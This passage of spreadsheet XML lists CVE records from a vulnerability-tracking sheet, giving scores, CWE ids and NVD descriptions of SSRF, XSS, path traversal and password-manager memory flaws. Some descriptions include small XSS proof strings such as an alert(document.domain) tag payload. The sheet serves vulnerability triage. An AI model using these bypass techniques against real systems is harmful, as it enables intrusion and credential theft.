          <t>CC: Tweaked is a mod for Minecraft which adds programmable computers, turtles, and more to the game. Prior to 1.120.0, the SSRF protection in projects/core/src/main/java/dan200/computercraft/core/apis/http/options/AddressPredicate.java blocks the RFC 6052 64:ff9b::/96 NAT64 prefix but omits the RFC 8215 64:ff9b:1::/48 local-use prefix. On a dual-stack server using RFC 8215 NAT64, an unauthenticated user who can execute Lua code can use http.request or http.websocket with an address under 64:ff9b:1::/48 to reach loopback, RFC 1918, cloud metadata, or internal API endpoints because PrivatePattern.matches() does not classify the mapped IPv6 address as private. This issue is fixed in version 1.120.0.</t>
        </is>
      </c>
      <c r="M1412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55758</t>
        </is>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69092</t>
        </is>
      </c>
      <c r="C1413" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1413" s="5" t="inlineStr"/>
      <c r="F1413" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1413" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1413" s="5" t="inlineStr"/>
      <c r="I1413" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1413" s="5" t="inlineStr"/>
      <c r="K1413" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1413" s="5" t="inlineStr">
        <is>
          <t>Admidio versions before 5.0.11 contain a reflected cross-site scripting vulnerability in the SSO/SAML endpoint that echoes unencoded exception messages to the HTTP response. Unauthenticated attackers can inject arbitrary JavaScript through SAML Issuer elements or LightSaml library parameters to execute code in users' browsers and hijack sessions.</t>
        </is>
      </c>
      <c r="M1413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69092</t>
        </is>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69198</t>
        </is>
      </c>
      <c r="C1414" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1414" s="5" t="inlineStr"/>
      <c r="F1414" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1414" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1414" s="5" t="inlineStr"/>
      <c r="I1414" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1414" s="5" t="inlineStr"/>
      <c r="K1414" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L1414" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.1.1 until 10.2.2, every special-use classification method is built on isInSubnet, which short-circuits to false whenever the address's own subnet mask is shorter than the reference range's mask. That mask comes verbatim from the CIDR suffix on the parsed input, so appending a suffix such as /0 suppresses classification entirely: isLoopback(), isPrivate(), isLinkLocal(), isCGNAT(), isMulticast(), isUnspecified(), isBroadcast(), isULA(), and getType() all report an internal address as unremarkable, while correctForm() and address still return the real internal target. An application that builds a network trust-boundary decision on these checks, for example a filter intended to block Server-Side Request Forgery, or SSRF, may therefore treat an internal target as external and allow the request. The underlying bit comparison is correct, and mask(n) already returns the first n bits of the full parsed address independently of subnetMask; the defect is solely that the containment guard sits in the classification path. This issue is fixed in version 10.2.2.</t>
        </is>
      </c>
      <c r="M1414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69198</t>
        </is>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69248</t>
        </is>
      </c>
      <c r="C1415" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1415" s="5" t="inlineStr"/>
      <c r="F1415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1415" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1415" s="5" t="inlineStr"/>
      <c r="I1415" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1415" s="5" t="inlineStr"/>
      <c r="K1415" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1415" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In versions 45.0.0 through 48.0.0, if an intermediate constrained CA permits the DNS name foo.example.com, and the leaf certificate has a wildcard in its DNS SAN of *.example.com, python-cryptography's verifier accepts which allows escaping outside of the permitted names. The core issue is in DNSConstraint::matches, where a wildcard pattern was treated as matching a more-specific permitted constraint even though *.example.com can expand to sibling names such as bar.example.com outside foo.example.com. This allows acceptance of an invalid certificate chain. This issue is fixed in 49.0.0.</t>
        </is>
      </c>
      <c r="M1415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69248</t>
        </is>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70611</t>
        </is>
      </c>
      <c r="C1416" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1416" s="5" t="inlineStr"/>
      <c r="F1416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1416" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H1416" s="5" t="inlineStr"/>
      <c r="I1416" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1416" s="5" t="inlineStr"/>
      <c r="K1416" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1416" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.1, and 42.0.0-beta.3, the DevTools reveal in file manager action could launch the target file rather than reveal it. An attacker with a separate means of running script inside the DevTools frontend, such as a malicious DevTools extension, could use showItemInFolder handling to execute native code outside the sandbox when DevTools is opened for windows exposed to untrusted content or untrusted DevTools extensions. This issue is fixed in 39.8.9, 40.9.2, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M1416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70611</t>
        </is>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71313</t>
        </is>
      </c>
      <c r="C1417" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1417" s="5" t="inlineStr"/>
      <c r="F1417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1417" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1417" s="5" t="inlineStr"/>
      <c r="I1417" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1417" s="5" t="inlineStr"/>
      <c r="K1417" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1417" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From v1.51.0 until v1.75.0, the local backend in backend/local/local.go relies on the configurable filename encoder to prevent remote filename data from becoming operating-system path syntax, so a local destination using Slash, None, Raw, or on Windows an encoding that preserves backslash can decode a standard-encoded fullwidth dot-dot component or native backslash form into an actual parent-directory component before filepath.Join resolves it outside the configured local root, allowing an attacker-controlled source object to create or overwrite files outside the selected destination directory as the rclone process. This issue is fixed in v1.75.0.</t>
        </is>
      </c>
      <c r="M1417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71313</t>
        </is>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73848</t>
        </is>
      </c>
      <c r="C1418" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1418" s="5" t="inlineStr"/>
      <c r="F1418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1418" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1418" s="5" t="inlineStr"/>
      <c r="I1418" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1418" s="5" t="inlineStr"/>
      <c r="K1418" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1418" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, tag names in emlog are not HTML-encoded when rendered in the article editor. An attacker can create a tag containing ');alert(document.domain);//. The addslashes() function does not escape HTML entities, so ' is stored as-is. When the browser renders the page, it decodes ' back to a literal single quote before evaluating the JavaScript, breaking out of the string and executing arbitrary code. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M1418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73848</t>
        </is>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74871</t>
        </is>
      </c>
      <c r="C1419" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1419" s="5" t="inlineStr"/>
      <c r="F1419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1419" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1419" s="5" t="inlineStr">
        <is>
          <t>jahlives:openssl_encrypt</t>
        </is>
      </c>
      <c r="I1419" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1419" s="5" t="inlineStr"/>
      <c r="K1419" s="5" t="inlineStr">
        <is>
          <t>CWE-916</t>
        </is>
      </c>
      <c r="L1419" s="5" t="inlineStr">
        <is>
          <t>openssl_encrypt versions before 1.4.6 contain a key derivation flaw in sequential XOR composition mode where the last stage cancels out during key generation. When configured with a single KDF and no prior hashing stage, attackers can bypass memory-hard key derivation and perform offline password cracking at SHA-256 speed instead of the configured KDF cost.</t>
        </is>
      </c>
      <c r="M1419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74871</t>
        </is>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75135</t>
        </is>
      </c>
      <c r="C1420" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1420" s="5" t="inlineStr"/>
      <c r="F1420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1420" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1420" s="5" t="inlineStr"/>
      <c r="I1420" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1420" s="5" t="inlineStr"/>
      <c r="K1420" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="L1420" s="5" t="inlineStr">
        <is>
          <t>UpSignOn for Windows before 7.19.0 contains a sensitive data exposure vulnerability that allows local attackers to recover the master password and decrypt vault contents by reading a retained backup key from the process memory of UpSignOn.exe, even after the vault has been re-locked. Attackers can extract the backup key from process memory to decrypt the encrypted master password backup stored in v6-vault1.DATA.txt, then use the recovered master password to decrypt the main vault and export all password manager entries in cleartext.</t>
        </is>
      </c>
      <c r="M1420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75135</t>
        </is>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75136</t>
        </is>
      </c>
      <c r="C1421" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1421" s="5" t="inlineStr"/>
      <c r="F1421" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1421" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1421" s="5" t="inlineStr"/>
      <c r="I1421" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1421" s="5" t="inlineStr"/>
      <c r="K1421" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1421" s="5" t="inlineStr">
        <is>
          <t>UpSignOn for Windows before 7.19.0 contains an insecure credential storage vulnerability that allows local attackers to retrieve the biometric unlock key stored in the Windows PasswordVault API without triggering any authentication prompt. Attackers can access the stored biometric key from a standard local process within the same Windows session to decrypt the protected vault files and export the entire password manager contents in cleartext.</t>
        </is>
      </c>
      <c r="M1421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75136</t>
        </is>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75137</t>
        </is>
      </c>
      <c r="C1422" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1422" s="5" t="inlineStr"/>
      <c r="F1422" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1422" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1422" s="5" t="inlineStr"/>
      <c r="I1422" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1422" s="5" t="inlineStr"/>
      <c r="K1422" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="L1422" s="5" t="inlineStr">
        <is>
          <t>UpSignOn for Windows before 7.19.0 contains a sensitive data exposure vulnerability that allows local attackers to recover cleartext vault data from process memory even after the application has been locked. Attackers can use the PROCESS_VM_READ permission to read the memory space of UpSignOn.exe and extract sensitive fields including entry names, URLs, usernames, passwords, TOTP secrets, and notes.</t>
        </is>
      </c>
      <c r="M1422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75137</t>
        </is>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78325</t>
        </is>
      </c>
      <c r="C1423" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1423" s="5" t="inlineStr"/>
      <c r="F1423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1423" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1423" s="5" t="inlineStr"/>
      <c r="I1423" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1423" s="5" t="inlineStr"/>
      <c r="K1423" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1423" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in the Evernote and Google Keep note importers in Standard Notes for Android through 3.201.24 allows an attacker to execute arbitrary JavaScript in the application context when a victim imports a crafted .enex or Google Keep HTML file, leading to theft of encryption keys and note data, and arbitrary invocation of native device APIs.</t>
        </is>
      </c>
      <c r="M1423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78325</t>
        </is>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82398</t>
        </is>
      </c>
      <c r="C1424" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1424" s="5" t="inlineStr"/>
      <c r="F1424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1424" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1424" s="5" t="inlineStr"/>
      <c r="I1424" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1424" s="5" t="inlineStr"/>
      <c r="K1424" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1424" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, an attacker can craft a PDF that causes long runtimes when the pypdf/_utils.py function read_until_whitespace reads a stream containing a long run of bytes without whitespace. The function repeatedly performs immutable bytes concatenation in a one-byte loop, causing quadratic processing cost for the long non-whitespace input. This issue is fixed in version 6.15.0.</t>
        </is>
      </c>
      <c r="M1424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82398</t>
        </is>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83611</t>
        </is>
      </c>
      <c r="C1425" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1425" s="5" t="inlineStr"/>
      <c r="F1425" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1425" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1425" s="5" t="inlineStr"/>
      <c r="I1425" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1425" s="5" t="inlineStr"/>
      <c r="K1425" s="5" t="inlineStr">
        <is>
          <t>CWE-1286</t>
        </is>
      </c>
      <c r="L1425" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMParser.parseFromString() can silently accept an end tag such as &lt;/a\njunk&gt;, close the element, and discard the trailing content. On 0.9.x, the lib/sax.js end-tag validator inherits the multiline flag from reg(), allowing the first line to satisfy the anchored XML ETag production; older lines have no equivalent residue validation. This parser differential can bypass a parse-before-trust well-formedness gate, although it does not inject the discarded content; onError on 0.9.x and errorHandler on 0.8.x are the relevant reporting interfaces. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t>
        </is>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84309</t>
        </is>
      </c>
      <c r="C1426" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1426" s="5" t="inlineStr"/>
      <c r="F1426" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1426" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1426" s="5" t="inlineStr"/>
      <c r="I1426" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1426" s="5" t="inlineStr"/>
      <c r="K1426" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L1426" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.0, an attacker can craft a PDF whose cyclic tree structure causes pypdf/generic/_data_structures.py TreeObject.insert_child to follow /Next links indefinitely when a writing code path inserts a child, producing an infinite loop. This issue is fixed in version 6.16.0.</t>
        </is>
      </c>
      <c r="M1426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84309</t>
        </is>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84697</t>
        </is>
      </c>
      <c r="C1427" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1427" s="5" t="inlineStr"/>
      <c r="F1427" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1427" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1427" s="5" t="inlineStr"/>
      <c r="I1427" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1427" s="5" t="inlineStr"/>
      <c r="K1427" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1427" s="5" t="inlineStr">
        <is>
          <t>Mailpit's IsInternalIP deny list function fails to block the Azure WireServer address 168.63.129.16 and the RFC 2765/6145 IPv4-translated IPv6 prefix, allowing server-side request forgery to internal destinations. Attackers can supply hostnames resolving to these addresses in message content to reach the link check API and proxy endpoint for accessing internal resources.</t>
        </is>
      </c>
      <c r="M1427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84697</t>
        </is>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84968</t>
        </is>
      </c>
      <c r="C1428" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1428" s="5" t="inlineStr"/>
      <c r="F1428" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1428" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1428" s="5" t="inlineStr">
        <is>
          <t>mongodb:php_driver</t>
        </is>
      </c>
      <c r="I1428" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1428" s="5" t="inlineStr"/>
      <c r="K1428" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1428" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the BSON decoding component of the MongoDB PHP driver may allow an unauthenticated party who supplies specially formed input to have a small amount of adjacent process memory copied into an error message that is returned to application code. This may result in unintended disclosure of limited memory contents.</t>
        </is>
      </c>
      <c r="M1428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84968</t>
        </is>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86188</t>
        </is>
      </c>
      <c r="C1429" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1429" s="5" t="inlineStr"/>
      <c r="F1429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1429" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1429" s="5" t="inlineStr"/>
      <c r="I1429" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1429" s="5" t="inlineStr"/>
      <c r="K1429" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1429" s="5" t="inlineStr">
        <is>
          <t>AVideo with YPTSocket plugin enabled contains a cross-site scripting vulnerability allowing unauthenticated attackers to execute arbitrary JavaScript in other users' browsers via the websocket callback mechanism. Attackers can send crafted socket messages with callback names resolving to global functions like avideoConfirmHTML that accept untrusted data and assign it to innerHTML, achieving script execution in the victim's origin without authentication or user interaction.</t>
        </is>
      </c>
      <c r="M1429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86188</t>
        </is>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86431</t>
        </is>
      </c>
      <c r="C1430" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1430" s="5" t="inlineStr"/>
      <c r="F1430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1430" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1430" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1430" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1430" s="5" t="inlineStr"/>
      <c r="K1430" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1430" s="5" t="inlineStr">
        <is>
          <t>league/commonmark (thephpleague/commonmark) versions &gt;= 2.7.0 and &lt; 2.9.1 contain a cross-site scripting vulnerability in the AttributesExtension. Prefixing an attribute name with a single U+000C form feed byte (e.g. {\x0Conclick="alert(1)"}) bypasses the AttributesHelper::filterAttributes() 'on*' event-handler filter because PHP's trim() does not strip U+000C, causing the attribute to be written verbatim into the output where browsers parse it as a genuine event handler. The same prefix also defeats the allow_unsafe_links check, allowing javascript: URIs through href/src attributes even when allow_unsafe_links is false. Exploitation requires processing untrusted Markdown with the AttributesExtension enabled; the injected script executes when the rendered HTML is viewed. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="M1430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86431</t>
        </is>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8794</t>
        </is>
      </c>
      <c r="C1431" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1431" s="5" t="inlineStr"/>
      <c r="F1431" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1431" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1431" s="5" t="inlineStr"/>
      <c r="I1431" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1431" s="5" t="inlineStr"/>
      <c r="K1431" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L1431" s="5" t="inlineStr">
        <is>
          <t>PaperCut NG/MF contains an observable timing discrepancy in its authentication component. An unauthenticated remote attacker can exploit this vulnerability to perform username enumeration by measuring response times during login attempts. The system executes a password hash comparison only when a valid account is supplied, creating a measurable timing oracle that reveals account existence.</t>
        </is>
      </c>
      <c r="M1431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8794</t>
